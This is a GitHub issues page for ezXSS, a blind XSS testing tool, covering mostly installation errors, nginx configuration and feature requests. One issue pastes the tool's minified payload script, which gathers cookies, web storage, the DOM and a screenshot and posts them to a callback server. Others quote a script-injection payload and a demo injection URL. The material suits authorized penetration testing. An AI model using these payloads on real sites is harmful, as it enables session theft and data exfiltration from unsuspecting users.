ssl / ezxss

1.8K 54.0 322.0 4.62 MB

ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.

Home Page: https://ezxss.com

License: MIT License

PHP 47.46% JavaScript 5.29% HTML 33.95% CSS 10.31% Dockerfile 0.29% Shell 0.67% Python 2.02%
payload xss blind php test xss-vulnerability xss-exploitation xss-detection xss-attacks xss-injection


ezxss's Issues

/manage/install not found (404)

Hello,

I have followed your install instructions and added the database details, but when I visit my site I get redirected to /manage/install; however, it does not exist.

Am I missing some steps? What should I do? I use endora.cz hosting.

Is it necessary to install in the root directory?

Hi @ssl

I tried to install the latest release in /ezxss/ directory, updated the db file, and tried to navigate /manage/install for installation, it gets redirected to /manage/login/ not /ezxss/manage/login/ without the installation process.

Trying to access array offset on value of type bool while reading response header from upstream

Hello again! We upgraded from PHP 7.2 to 7.4 and we're seeing these errors in our Nginx error logs:

2020/05/18 00:17:41 [error] 16821#16821: *57 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/Component.php on line 42" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "GET /manage/login HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/reports"

2020/05/18 00:17:46 [error] 16821#16821: *57 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/User.php on line 64" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "POST /manage/request HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/login"

2020/05/18 01:39:22 [error] 16821#16821: *112 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/Component.php on line 274" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "GET /manage/settings HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/login"

Looking back through the logs before the 7.4 upgrade, I do not see these messages.

Bug found while searching and deleting domains

Hi, when I search for a domain so I can mass remove it via the dashboard, I get a URL formatted like https://localhost/manage/reports?search=example.com and 50 search results (I would really like to see a button to display all search results) on the page. I select all, tap delete and, instead of seeing more search results, nothing is shown on the page. If I tap next, I am taken to a peculiar URL: https://localhost/manage/reports?page=1example.com which just shows me page 1 of all the reports received.

Performance issue when reports > 7000

Thank you for providing this amazing software to the community.

After I reached 7000 reports (ID is over 9700 though only have 7443 live reports) in my ezXSS install, I began to notice that loading https://domain/manage/dashboard after logging in was taking an inordinate amount of time to load (38 seconds to be exact). I'm curious if there are some optimizations that could be made here because when I instead load https://domain/manage/payload immediately upon logging in, the page loads instantly, however when I navigate back to https://domain/manage/dashboard, it takes longer than expected to load (38 seconds).

PHP 7.2.24-0ubuntu0.19.04.2
mysql-server 5.7.28-0ubuntu0.19.04.2

Nothing really stands out when I run mysqltuner; however, CPU usage appears to be at 100% of a single CPU core whilst this endpoint is loading. Thank you for investigating this issue.

About Payload

First of all, I would like to say thank you for creating this project. My issue is about the custom payload: when I create my custom payload it says my payload has been saved, but I don't know where I can see my stored custom payload. One more thing is I don't know how to use this project.... I hope you don't mind my English.

dir

The directory "manage" does not exist. How can I install it? Must I start from version 2.3?

nginx may expose .env secrets

The following was brought up by @geeknik.

If folks want to use .env, they'll need to properly configure their server in order to ensure the .env file doesn't get inadvertently exposed to the world. Here is a configuration example for nginx which denies access to locations starting with . other than the .well-known directory:

location ~ /\.(?!well-known).* {
    deny all;
    access_log off;
    log_not_found off;
}

Originally posted by @geeknik in #54 (comment)
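To see what that nginx `location` regex actually covers before relying on it, here is an added Python example (not part of @geeknik's comment or the ezXSS project) that applies the same pattern to a handful of constructed request paths. nginx compiles `location ~` patterns with PCRE and matches them unanchored against the request URI, and Python's `re.search` with the same negative lookahead behaves identically for this pattern, so the results carry over. The sample paths are constructed for the example.

```python
import re

# Same pattern as the nginx "location ~ /\.(?!well-known).*" block above:
# any path segment beginning with "." is matched unless it starts with "well-known".
DOTFILE_DENY = re.compile(r"/\.(?!well-known).*")


def is_denied(path: str) -> bool:
    """Return True if the nginx deny rule would match this request URI."""
    # nginx regex locations are not anchored to the start of the URI,
    # so use search(), not match().
    return DOTFILE_DENY.search(path) is not None


# Constructed sample paths (not from the page) with the expected outcome.
SAMPLE_PATHS = {
    "/.env": True,                               # the case the issue is about
    "/.git/config": True,                        # any other dot-directory too
    "/manage/.env": True,                        # also matches deeper in the tree
    "/.well-known/acme-challenge/token": False,  # ACME challenges stay reachable
    "/index.php": False,
    "/assets/style.css": False,
    # Caveat: the lookahead only excludes the literal prefix "well-known",
    # so a directory such as ".well-known-old" is NOT denied by this rule.
    "/.well-known-old/secret": False,
}


def audit(paths=SAMPLE_PATHS):
    """Map each path to whether the rule denies it, for a quick coverage review."""
    return {p: is_denied(p) for p in paths}


if __name__ == "__main__":
    for path, denied in audit().items():
        print(f"{'DENY ' if denied else 'ALLOW'} {path}")
```

The last sample path is the one worth noticing: the exclusion is a prefix match, so anything under a dot-directory whose name merely begins with `well-known` is served. If tighter behaviour is wanted, anchor the exception (for example `(?!well-known/)`), and keep in mind that this rule says nothing about `.env` files reachable through a different document root or an alias.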

Update 4.0

Hi, when will version 4.0 be updated, and will there be multiple users?
@ssl

/manage/install missing

Hello,

I tried to set up this tool. Apache is up, and I added the DB information in the file /src/Database, but I cannot access /manage/install since it does not exist. Can you please tell me if I missed a step?

Thank you

help!!!

PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/html/ezxss/src/Database.php:43\nStack trace:\n#0 /var/www/html/ezxss/src/Database.php(95): Database->fetch('SELECT value FR...', Array)\n#1 /var/www/html/ezxss/src/Route.php(19): Database->fetchSetting('timezone')\n#2 /var/www/html/ezxss/index.php(35): Route->__construct()\n#3 {main}\n thrown in /var/www/html/ezxss/src/Database.php on line 43

PHP: Fatal error: Uncaught Error: Call to a member function prepare() on null

Hello @ssl

Here is the error (manage/install)

Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23

full error message

[Mon Mar 18 12:27:08.553386 2019] [php7:error] [pid 2083] [client 194.34.132.57:57567] PHP Fatal error:  Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23\nStack trace:\n#0 /var/www/html/manage/src/Component.php(17): Database->fetch('SELECT * FROM s...', Array)\n#1 /var/www/html/manage/src/Component.php(13): Component->settings('timezone')\n#2 /var/www/html/manage/src/Route.php(7): Component->__construct()\n#3 /var/www/html/manage/src/Bootstrap.php(12): Route->__construct()\n#4 /var/www/html/manage/index.php(9): require('/var/www/html/m...')\n#5 {main}\n  thrown in /var/www/html/manage/src/Database.php on line 23

Database issue

Hi, something seems to be wrong with the DB I created.
I created an empty db and filled the values in src/Database.php
When accessing manage/install I got 500
My first issue was because of the timezone:
[Mon Apr 13 03:28:15.271362 2020] [php7:error] [pid 16860] [client xx.xxx.xxx.xx:xxxxx] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/mydomain.com/src/Database.php:43\nStack trace:\n#0 /var/www/mydomain.com/src/Database.php(95): Database->fetch('SELECT value FR...', Array)\n#1 /var/www/mydomain.com/src/Route.php(19): Database->fetchSetting('timezone')\n#2 /var/www/mydomain.com/index.php(30): Route-> __construct()\n#3 {main}\n thrown in /var/www/mydomain.com/src/Database.php on line 43
I was able to work around this by changing src/Route.php to

      /**
      if(!empty($this->database->fetchSetting('timezone'))) {
        date_default_timezone_set($this->database->fetchSetting('timezone'));
      } else {
        date_default_timezone_set('Europe/Amsterdam');
      }
      **/
      date_default_timezone_set('Europe/Amsterdam');

Now, I get a second issue which I cannot resolve stating in my error.log:
[Mon Apr 13 13:36:48.158340 2020] [php7:error] [pid 17701] [client xx.xxx.xxx.xx:xxxxx] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/mydomain.com/src/Database.php:83\nStack trace:\n#0 /var/www/mydomain.com/src/Route.php(57): Database->rowCount('SELECT * FROM s...')\n#1 /var/www/mydomain.com/index.php(31): Route->template('install')\n#2 {main}\n thrown in /var/www/mydomain.com/src/Database.php on line 83

Any idea what I am doing wrong with my DB?

Added nginx support

Hello! Your program is awesome, but I see you only have Apache support in the README, while I'm using NGINX.

I've made a config that works with ezXSS 3.0 for NGINX, and I will be glad if you add it to your README so other people won't waste their time if they have NGINX too :)

server {
    listen 80;
    listen [::]:80;

    root /var/www/html/ezxss;
    client_max_body_size 150m;
    # Add index.php to the list if you are using PHP
    index index.php index.html index.htm index.nginx-debian.html;

    server_name 'YOUR DOMAIN NAME';
    add_header 'Access-Control-Allow-Origin' '*';
    add_header 'Access-Control-Allow-Methods' 'GET, POST';
    add_header 'Access-Control-Allow-Headers' 'origin, x-requested-with, content-type';

    autoindex off;

    location /
    {
        if ($uri !~ "assets")
        {
            set $rule_0 1$rule_0;
        }

        if ($rule_0 = "1")
        {
            rewrite ^/(.*)$ /index.php;
        }
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
    }
}

Regarding Rewrite Rules

Hi SSL,

I'm trying to install ezXSS with LNMP.

However, I have some troubles when I convert .htaccess to Nginx rewrite rules.

Could you provide nginx rewrite rules, if possible? Or I have to use LAMP environment?

More than thanks.

From email is not valid

Currently on line 263 of src/Route.php we see $headers[] = 'From: ezXSS';, which shows the From email is defined as ezXSS. This, however, is not valid email syntax and can cause emails to bounce or go to spam in some configurations.

As a fix I suggest we implement the option to define the From email in the settings.

Alternatively we can set this as the same email the user provided earlier as done in c0af956 or set it as ezxss@{domain} as done in 300c553. If the first solution of a user configurable from email is preferred I will let you implement that. Otherwise if one of the alternatives is preferred I can submit a PR with this change.

ezXSS v3.2 - Failed to load resource: the server responded with a status of 406 ()

I just installed ezXSS v3.2 and I am facing an issue with the payload <script src=//domain.me></script>.

Screenshot 2020-06-04 at 4 08 47 AM

But your provided demo https://xss-game.appspot.com/level1/frame?query=test%3Cscript%20src=//demo.ezxss.com%3E%3C/script%3E works fine https://demo.ezxss.com/manage/report/1b1cc80e3a83bee557fd1b177d838ba8a7eed1ba

Although this payload works for the stored XSS scenario.

I also cross-checked with another user who has been using the same updated version for a long time, and I confirm that his is also not working for the same scenario.

Hope you will take a look at this issue.

Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23

Hello @ssl 👍

  • After pointing the Database.php entries to my empty MySQL DB, I'm getting the following exception while loading /manage/install. Am I missing something?
# tail /var/log/nginx/error.log 
  thrown in /var/www/html/manage/src/Database.php on line 23" while reading response header from upstream, client: 49.206.213.140, server: woot.me, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "woot.me"
2018/08/19 01:11:00 [alert] 6493#6493: *20 open socket #11 left in connection 5
2018/08/19 01:11:00 [alert] 6493#6493: aborting
2018/08/19 01:11:48 [error] 6644#6644: *5 FastCGI sent in stderr: "PHP message: PHP Fatal error:  Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23
Stack trace:
#0 /var/www/html/index.php(10): Database->fetch('SELECT * FROM s...')
#1 {main}
  thrown in /var/www/html/manage/src/Database.php on line 23" while reading response header from upstream, client: 49.206.213.140, server: woot.me, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "woot.me"
2018/08/19 01:15:15 [notice] 7755#7755: signal process started
2018/08/19 01:17:26 [notice] 7797#7797: signal process started

Cant install

  1. Downloaded the last release
  2. Unzipped it to the root
  3. Configured src/Database.php
  4. Opening mydomain.com/manage/install gives 404 Not Found.

What is wrong, can you please help?

[Feature] Extract additional pages on initial XSS fire

Hello! I would like to suggest to add "Extracted URLs" page under "Reports" section or as a tab in Reports page.

A feature similar to what XSSHunter has now, called "Collected pages". The XSS will just extract the HTML of additional pages defined by the user somewhere in settings, which can be like "/home/foo/bar/secret.html" or "/robots.txt".

Great framework with nice UI, still need to tweak font color in some places like reports page :)

Thanks.

Timezone Format

Hi,

What is the format that is being used to set a new time zone? I live in United States/Rochester; I tried different combos and still no luck. Where does it check to validate the time zone?

Feature Request: Share via email

The ability to share a finding over email would be an awesome feature. Currently I have my firewall set to block /manage/ for everyone besides me, but I would still like to be able to share findings as needed. Being able to essentially resend the report email but to a user specified address would address this.

Block domains doesn't actually block anything

I've got ezXSS installed and it's collecting reports and callbacks and everything is working nicely. Except when I put a domain in Settings->Block domains and tap Save, it doesn't actually stop the emails or the reports from being generated. It does save the domains in the list and they persist between sessions, so that is working.

On a related front, the Don't save report or send alert option doesn't seem to be working here either as I've gotten about 40 reports from the same domain.

Anything I can do on my end?

Regarding Installation file of ezxss

Hey,

I was installing ezxss on one of my hostings, but there is no installation file. Can anybody send me, or tell me where I can get, this file?

Thanks,

New reports aren't visible in /manage/reports page

Hey ,

While I was trying to see how it works, I noticed that any new reports generated won't be visible in the /manage/reports page. Although I can get the reports with the search option (searching for the domain), it will be useless if it works like that.

Thanks

Screenshot feature

Hi,

I see you have this feature on your to-do list. I would be interested to know your thoughts about not including this feature in the initial release: any specific or technical reason? This is an important option to have for displaying the impact of bXSS.

Thanks for maintaining this project.

Sharing report URL links to wrong report?

This just started happening recently and I have no idea how to troubleshoot it because it doesn't happen with every report, or even every other report. The only thing that the 2 URLs share in common is the .co.uk TLD. I see nothing strange in the nginx access or error logs.

payload.js cannot get the current domain name

I deployed it with dnmp (an LNMP environment). After installation I found that when I access the domain, the domain used for the POST submission in the returned JS is localhost. Apart from forcibly changing it to the current domain in payload.js, is there any other way?

function ez_n(e){return void 0!==e?e:""}function ez_cb(e){var t=new XMLHttpRequest;t.open("POST","https://localhost/callback",!0),t.setRequestHeader("Content-type","text/plain"),t.onreadystatechange=function(){4==t.readyState&&t.status},t.send(JSON.stringify(e))}function ez_hL(){try{ez_rD.uri=ez_n(location.toString())}catch(e){ez_rD.uri=""}try{ez_rD.cookies=ez_n(document.cookie)}catch(e){ez_rD.cookies=""}try{ez_rD.referrer=ez_n(document.referrer)}catch(e){ez_rD.referrer=""}try{ez_rD["user-agent"]=ez_n(navigator.userAgent)}catch(e){ez_rD["user-agent"]=""}try{ez_rD.origin=ez_n(location.origin)}catch(e){ez_rD.origin=""}try{ez_rD.localstorage=window.localStorage;}catch(e){ez_rD.localstorage="";}try{ez_rD.sessionstorage=window.sessionStorage;}catch(e){ez_rD.sessionstorage="";}try{ez_rD.dom=ez_n(document.documentElement.outerHTML)}catch(e){ez_rD.dom=""}try{html2canvas(document.body).then(function(e){ez_rD.screenshot=ez_n(e.toDataURL()),ez_c();});}catch(e){ez_rD.screenshot="",ez_c()}function ez_c(){ez_r(),ez_cb(ez_rD)}}function ez_aE(e,t,n){e.addEventListener?e.addEventListener(t,n,!1):e.attachEvent&&e.attachEvent("on"+t,n)}ez_rD={},"complete"==document.readyState?ez_hL():ez_aE(window,"load",function(){ez_hL()});

Include Ansible/Docker

I made an ansible role for ezXSS that sets up ezXSS inside a docker container with a corresponding database, so ezXSS can be up and running quickly.

If you'd be interested in adding it to ezXSS, I can clean it up turn it into a pull request.

Hello, how do you install it

LAMP environment, installing ezXSS, PHP version 7.2.4. Directories and files are all set to www:www permissions; the files cannot be accessed, but a test probe I added can be accessed. There are no other environment or plugin requirements. Parse error: syntax error, unexpected '0' (T_LNUMBER), expecting ',' or ') in /manage/src/User.php on line 197

2FA feature issue

Thank you very much for the open source project.
I have successfully installed it and tested the 2FA function. The prompt says it was added successfully, but when I log in again, I still only need a password to log in, with no secondary authentication.

Report #0 received via email, but Report #0 doesn't actually exist on the dashboard

Hello and thank you for this most excellent software. An issue that I've tried and failed to troubleshoot on my end is that every once in a while, I'll receive a report via email which doesn't exist in the dashboard and at the top of the email it says:

XSS Report #0
Get a fast view below or view the whole report on https://domain_name/manage/report/0

There is never a Report #0 and there is no rhyme or reason as to when or how often this happens. Even though it doesn't save the report to the DB, it did save a screenshot (this time) and I'm able to view that. Any thoughts?

500 Internal Server Error

Hi,
I'm trying to install ezXSS; unfortunately, I immediately get a 500 error.

  • Debian 10 / Apache2 (with header & rewrite mod) / php7.3 (with php-curl)

My apache2 config :

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/ezXSS

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
        <Directory /var/www/ezXSS>
                Options Indexes FollowSymLinks
                AllowOverride All
                Require all granted
        </Directory>
</VirtualHost>

And when I try a curl :

root@ezXSS:/var/www/ezXSS# curl -v 127.0.0.1/manage/install
* Expire in 0 ms for 6 (transfer 0x559904f25f50)
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x559904f25f50)
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /manage/install HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.64.0
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 12 Aug 2020 14:00:42 GMT
< Server: Apache/2.4.38 (Debian)
< Set-Cookie: PHPSESSID=mdco9pjh1gadnp666atv9f3s1v; expires=Wed, 21-Oct-2020 00:40:42 GMT; Max-Age=6000000; path=/; HttpOnly
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Access-Control-Allow-Headers: origin, x-requested-with, content-type
< Access-Control-Allow-Methods: GET, POST
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
<
* Closing connection 0

Thanks

Options on what to collect from the page

It would be great if there were an option to select what information you want to collect from the page.

For example, sometimes the URL (and IP) is enough and you don't want to collect the DOM and cookies (some bounty programs don't want you to do that).

Thanks

Not "easy 2 clicks install"

First of all, it's not just "copy the files and you're done".

Just pasting the files in the directory hasn't helped; I saw a 404 on manage/install.

So you have to modify /etc/nginx/sites-available/default, add the rewrite rules in your host's locations (80, 443) and comment out the default / location as done below.

add_header 'Access-Control-Allow-Origin' '*';
add_header 'Access-Control-Allow-Methods' 'GET, POST';
add_header 'Access-Control-Allow-Headers' 'origin, x-requested-with, content-type';

    #Re-write Rule
    location /
    {
            rewrite ^/callback/?$ /callback.php last;
    }

    location /manage
    {
            if ($uri !~ "assets")
            {
                    set $rule_0 1$rule_0;
            }

            if ($rule_0 = "1")
            {
                    rewrite ^/(.*)$ /manage/index.php;
            }
    }
    #Rule end
    #location / {
            # First attempt to serve request as file, then
            # as directory, then fall back to displaying a 404.
    #       try_files $uri $uri/ =404;
    #}

Then I saw this: *1 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /var/www/html/manage/src/Component.php:61

So we should install php-curl (that wasn't done on the clean system):
sudo apt-get install php-curl

Settings -> Filters not working as expected.

Hi, I have the Filters setting to "Don't save report or send alert" when a report is already known as seen here:
Screenshot_2019-07-08_10-43-24
However, I still get multiple reports in a row with the same URL. Is there something else I can do here to better prevent getting inundated with reports from the same URL? Thank you.
